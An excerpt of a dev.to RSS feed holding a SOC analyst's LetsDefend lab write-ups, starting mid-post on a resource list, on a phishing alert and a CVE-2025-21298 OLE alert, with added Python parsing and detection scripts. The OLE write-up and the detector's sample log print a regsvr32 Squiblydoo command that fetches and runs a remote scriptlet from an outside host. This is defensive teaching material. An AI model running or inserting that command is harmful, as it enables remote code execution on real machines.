  Some resources they recommend:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=iyAyN3GFM7A&amp;amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;amp;index=1" rel="noopener noreferrer"&gt;LiveOverFlow&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ike.mahaloz.re/1_introduction/introduction.html" rel="noopener noreferrer"&gt;Ike: The Systems Hacking Handbook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/mytechnotalent/Reverse-Engineering-Tutorial" rel="noopener noreferrer"&gt;Reverse Engieering tutorial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ost2.fyi/Arch1001" rel="noopener noreferrer"&gt;Architecture 1001 - OpenSecurity2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://open.umn.edu/opentextbooks/textbooks/733" rel="noopener noreferrer"&gt;x86-64 book&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://squallygame.com/" rel="noopener noreferrer"&gt;game&lt;/a&gt; to teach you x86 assembly and one to &lt;a href="https://oooverflow.io/zero-is-you/" rel="noopener noreferrer"&gt;stress test your knowledge&lt;/a&gt;!&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://soc.me/interfaces/x86-prefixes-and-escape-opcodes-flowchart" rel="noopener noreferrer"&gt;flowchart&lt;/a&gt; of x86 prefix and escape opcodes.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.felixcloutier.com/x86/" rel="noopener noreferrer"&gt;Detailed x86 reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;I built this because I wanted to understand. Now I do.&lt;/em&gt;&lt;br&gt;
&lt;em&gt;VENI. VIDI. VICI.&lt;/em&gt;&lt;br&gt;
&lt;em&gt;AD MELIORA!&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Here's my &lt;a href="https://www.linkedin.com/in/hitanshu-gedam/" rel="noopener noreferrer"&gt;LinkedIn&lt;/a&gt; if you wanna connect!&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>networksec</category>
      <category>server</category>
      <category>discuss</category>
    </item>
    <item>
      <title>LetsDefend SOC338 - Lumma Stealer - DLL Side-Loading via Click Fix Phishing</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Mon, 27 Apr 2026 18:01:11 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc338-lumma-stealer-dll-side-loading-via-click-fix-phishing-p8l</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc338-lumma-stealer-dll-side-loading-via-click-fix-phishing-p8l</guid>
      <description>&lt;p&gt;This time we are investigating another CRITICAL level alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjazo4iuxgr3kyf62a5nv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjazo4iuxgr3kyf62a5nv.png" alt="takeownership" width="800" height="230"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start with taking ownership of the alert and then head to the Investigation Channel and create a case.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd1szw9z49zu9tezrycv3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd1szw9z49zu9tezrycv3.png" alt="createdcase" width="712" height="526"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's start the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2433w2g0kq8qz5mnqgzc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2433w2g0kq8qz5mnqgzc.png" alt="playbok1" width="800" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start with the first instruction: parse the email.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k4u3pgry2t16u33pd0i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9k4u3pgry2t16u33pd0i.png" alt="parseemail" width="800" height="430"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight email"&gt;&lt;code&gt;&lt;span class="nt"&gt;From&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; update@windows-update[.]site&lt;/span&gt;
&lt;span class="nt"&gt;To&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; dylan[@]letsdefend.io&lt;/span&gt;
&lt;span class="nt"&gt;Subject&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Upgrade your system to Windows 11 Pro for FREE&lt;/span&gt;
&lt;span class="nt"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Mar, 13, 2025, 09:44 AM&lt;/span&gt;
&lt;span class="nt"&gt;Action&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Allowed&lt;/span&gt;
&lt;span class="nt"&gt;SMTP Address&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; 132.232.40.201&lt;/span&gt;
&lt;span class="nt"&gt;Attachment&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; No files, but there are URLs present.&lt;/span&gt;
&lt;span class="nt"&gt;Suspicious&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="na"&gt; Yes, because there were multiple 'Update Now' buttons, indicating a phishing attempt&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
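&lt;p&gt;An added example, not part of the original write-up: the header fields above, parsed into the artifacts the playbook asks for later (sender address, sender domain, SMTP address, whether the mail was delivered). The platform displays indicators defanged (&lt;code&gt;[.]&lt;/code&gt;, &lt;code&gt;[@]&lt;/code&gt;), so the helpers refang them for a VirusTotal lookup and defang them again for the case notes. The sample block is constructed from the fields shown on this page; the URL from the email body is not reproduced here.&lt;/p&gt;

```python
import ipaddress
import re

# Constructed sample: the fields shown in the alert, defanged as the platform displays them.
SAMPLE_ALERT = """\
From: update@windows-update[.]site
To: dylan[@]letsdefend.io
Subject: Upgrade your system to Windows 11 Pro for FREE
Date: Mar, 13, 2025, 09:44 AM
Action: Allowed
SMTP Address: 132.232.40.201
"""


def refang(text):
    """Turn hxxp://, [.] and [@] back into a live indicator for a reputation lookup."""
    return (text.replace("[.]", ".").replace("[@]", "@")
                .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def defang(text):
    """Neutralise an indicator for case notes so it cannot be clicked or resolved."""
    text = re.sub(r"^https?://", lambda m: m.group(0).replace("http", "hxxp"), text)
    return text.replace(".", "[.]").replace("@", "[@]")


def parse_alert(text):
    """Split 'Name: value' lines into a dict; values keep their defanging."""
    fields = {}
    for line in text.splitlines():
        name, colon, value = line.partition(":")
        if colon:
            fields[name.strip()] = value.strip()
    return fields


def extract_artifacts(fields):
    """Build the artifact list: live values for lookups, plus a delivery and IP sanity check."""
    sender = refang(fields["From"])
    domain = sender.rsplit("@", 1)[1]
    smtp_ip = ipaddress.ip_address(fields["SMTP Address"])   # raises ValueError on junk
    return {
        "sender_address": sender,
        "sender_domain": domain,
        "smtp_ip": str(smtp_ip),
        "delivered": fields.get("Action", "").lower() == "allowed",
        # A private/reserved SMTP address would mean we are looking at an internal relay,
        # not the true origin, and the lookup should move to the next hop instead.
        "smtp_ip_is_public": smtp_ip.is_global,
        "notes": {key: defang(value) for key, value in
                  (("sender", sender), ("domain", domain), ("smtp_ip", str(smtp_ip)))},
    }


if __name__ == "__main__":
    for key, value in extract_artifacts(parse_alert(SAMPLE_ALERT)).items():
        print(key, value)
```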



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgmwtdhm90i4oxu926fur.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgmwtdhm90i4oxu926fur.png" alt="attachment" width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If we copy the url from the email and look it up on VirusTotal we see the following:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9gk9oiaojooi3t1yenic.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9gk9oiaojooi3t1yenic.png" alt="virustotal" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;11 out of 91 vendors flag this URL as malicious.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsxzwyzhy2sowxajc4pta.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsxzwyzhy2sowxajc4pta.png" alt="malicious" width="800" height="477"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The next question is:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8djyy2y2g25tg4g9rsb3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8djyy2y2g25tg4g9rsb3.png" alt="deliveredkya" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flmwibnti1csj0elnn7wd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flmwibnti1csj0elnn7wd.png" alt="alowed" width="800" height="319"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The alert details, under the Action field, show the value Allowed, confirming that the email was delivered to the recipient.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fr322da8xm5k9naln2l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fr322da8xm5k9naln2l.png" alt="delivered" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffummpxhc1w2e639ndc90.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffummpxhc1w2e639ndc90.png" alt="delete" width="800" height="261"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next task is to delete the email&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgog4eluno8958a2ua0ds.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgog4eluno8958a2ua0ds.png" alt="emailsecurity" width="800" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we move to the Email Security tab, look for the particular email and delete it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh28u31p533ji9mgbdjgv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh28u31p533ji9mgbdjgv.png" alt="deleted" width="800" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkc0q3c4syurfzrvw3oi6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkc0q3c4syurfzrvw3oi6.png" alt="playbook3" width="800" height="422"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we need to find out if Dylan accessed the malicious URL. We move to Endpoint Security and check whether the URL was accessed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftevoihp900ql841gb9h5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftevoihp900ql841gb9h5.png" alt="accessed" width="800" height="376"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We see that the URL was, in fact, accessed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxa2u29815zhfwm4j6f6o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxa2u29815zhfwm4j6f6o.png" alt="playbook4" width="800" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next step is to contain the host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7m5x49rddklf0iby196j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7m5x49rddklf0iby196j.png" alt="contained" width="800" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The machine is contained.&lt;/p&gt;

&lt;p&gt;Our next step is to add the artifacts:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjfofm64ilzniuetx3c2e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjfofm64ilzniuetx3c2e.png" alt="artifacts" width="800" height="518"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After adding the analyst's notes, we finish the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fep8f89nqrc1qeqp46676.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fep8f89nqrc1qeqp46676.png" alt="finish" width="800" height="253"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw5r2ybw5vzahbf1zv5g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgw5r2ybw5vzahbf1zv5g.png" alt="close" width="588" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we close the alert on the monitoring page.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 26 Apr 2026 19:18:10 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298-3k77</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298-3k77</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyykib4spsrzr7cfsk0fb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyykib4spsrzr7cfsk0fb.png" alt="taking ownership" width="800" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the alert we will be working with.&lt;br&gt;
Let's start by taking ownership of this alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr49b9at2zr012dtpynko.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr49b9at2zr012dtpynko.png" alt="tookownership" width="702" height="510"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now let's go ahead to the Investigation channel and create a case for this alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lhy8tai6uktiuzgq0fc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lhy8tai6uktiuzgq0fc.png" alt="nvd" width="800" height="441"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Above is a screenshot of the NIST National Vulnerability Database entry for the CVE named in this alert.&lt;br&gt;
link: &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-21298" rel="noopener noreferrer"&gt;https://nvd.nist.gov/vuln/detail/CVE-2025-21298&lt;/a&gt;&lt;br&gt;
The CVSS base score is 9.8, which is rated CRITICAL.&lt;/p&gt;

&lt;p&gt;This vulnerability allows an attacker to execute code remotely via a specially crafted OLE (Object Linking and Embedding) object, without user interaction; in an email scenario the Outlook preview pane is enough to trigger it, which is why the process tree below starts at Outlook.exe. Knowing this, I looked for unusual child processes spawned by Office or mail applications and for script execution.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgsnbjzloq33xway5flgh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgsnbjzloq33xway5flgh.png" alt=" " width="800" height="420"&gt;&lt;/a&gt;&lt;br&gt;
I went to the Endpoint Security tab, searched for the SMTP IP from the alert, and looked through the "Processes" logs. Here is what I found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;cmd.exe was executed at 08:06:08 AM with Outlook.exe as its parent process. That is a clear red flag: an email client rarely has a legitimate reason to spawn a command shell.&lt;/li&gt;
&lt;li&gt;At 08:06:25 AM, cmd.exe spawned regsvr32.exe.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Malicious command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;C&lt;/span&gt;:\Windows\System32\cmd.exe &lt;span class="na"&gt;/c &lt;/span&gt;&lt;span class="nb"&gt;regsvr32.exe&lt;/span&gt; &lt;span class="na"&gt;/s /u /i&lt;/span&gt;&lt;span class="nl"&gt;:http&lt;/span&gt;://84.38.130.118.com/shell.sct &lt;span class="kd"&gt;scrobj&lt;/span&gt;.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command uses cmd.exe /c to run regsvr32 silently (/s), in unregister mode (/u), passing a remote scriptlet URL through /i: to scrobj.dll, the Windows Script Component runtime, which fetches and executes the scriptlet. This is the well-known "living off the land" technique called Squiblydoo: a signed Microsoft binary downloads and runs attacker code, so application allow-listing that trusts regsvr32 does not stop it. The URL shown (&lt;a href="http://84.38.130.118.com/shell.sct" rel="noopener noreferrer"&gt;http://84.38.130.118.com/shell.sct&lt;/a&gt;) points at a .sct scriptlet named shell.sct, which is highly suspicious and commonly associated with payload delivery, persistence, or remote command execution. On a real system this should be treated as a likely malicious execution and investigated immediately: the process tree, the host's network and DNS logs, the downloaded content, persistence artifacts, and EDR alerts.&lt;/p&gt;
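&lt;p&gt;As an added example (not code from the original post or from LetsDefend), the following Python script applies the two indicators described above to endpoint process logs: an Office or mail client spawning a shell, and regsvr32 being handed a remote scriptlet through /i: together with scrobj.dll. The pipe-separated log format, the host name and the benign filler lines are constructed for the example; only the regsvr32 command line is the one from the alert.&lt;/p&gt;

```python
"""Flag Squiblydoo-style regsvr32 abuse and Office-spawned shells in
endpoint process logs. Added example; the log format is a constructed
stand-in for an EDR "Processes" export (time|host|parent|image|command)."""
import re
from dataclasses import dataclass
from typing import List

# Mail and Office clients that should practically never spawn a shell.
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
# Interpreters and LOLBins that, as children of the above, warrant a look.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# The /i: argument of regsvr32 carrying a URL instead of a local path.
URL_ARG = re.compile(r"/i:\s*(https?://[^\s\"']+)", re.IGNORECASE)


@dataclass
class Finding:
    time: str
    host: str
    rule: str
    detail: str


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(lines: List[str]):
    findings = []
    for line in lines:
        if not line.strip():
            continue
        time, host, parent, image, cmdline = (p.strip() for p in line.split("|", 4))
        parent_name, image_name = basename(parent), basename(image)

        # Rule 1: process tree. Outlook.exe spawning cmd.exe is the red flag
        # from the investigation above, whatever the command line says.
        if parent_name in OFFICE_PARENTS and image_name in SHELLS:
            findings.append(Finding(time, host, "office-spawns-shell",
                                    parent_name + " spawned " + image_name))

        # Rule 2: command line. regsvr32 + scrobj.dll + /i:http(s)://... is the
        # Squiblydoo pattern; matching on the command line catches the
        # cmd.exe /c wrapper as well as the regsvr32.exe child itself.
        low = cmdline.lower()
        if "regsvr32" in low and "scrobj.dll" in low:
            m = URL_ARG.search(cmdline)
            if m:
                findings.append(Finding(time, host, "squiblydoo", m.group(1)))
    return findings


# Constructed sample export (not real LetsDefend data). The regsvr32 command
# line is the one from the alert; host name and the other lines are filler.
SAMPLE_LOG = """\
08:05:51|HOST-01|C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE|OUTLOOK.EXE
08:06:08|HOST-01|C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll
08:06:25|HOST-01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll
08:07:02|HOST-01|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32.exe /s C:\\Program Files\\Vendor\\component.dll
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG.splitlines()):
        print(f"{f.time} {f.host} [{f.rule}] {f.detail}")
```

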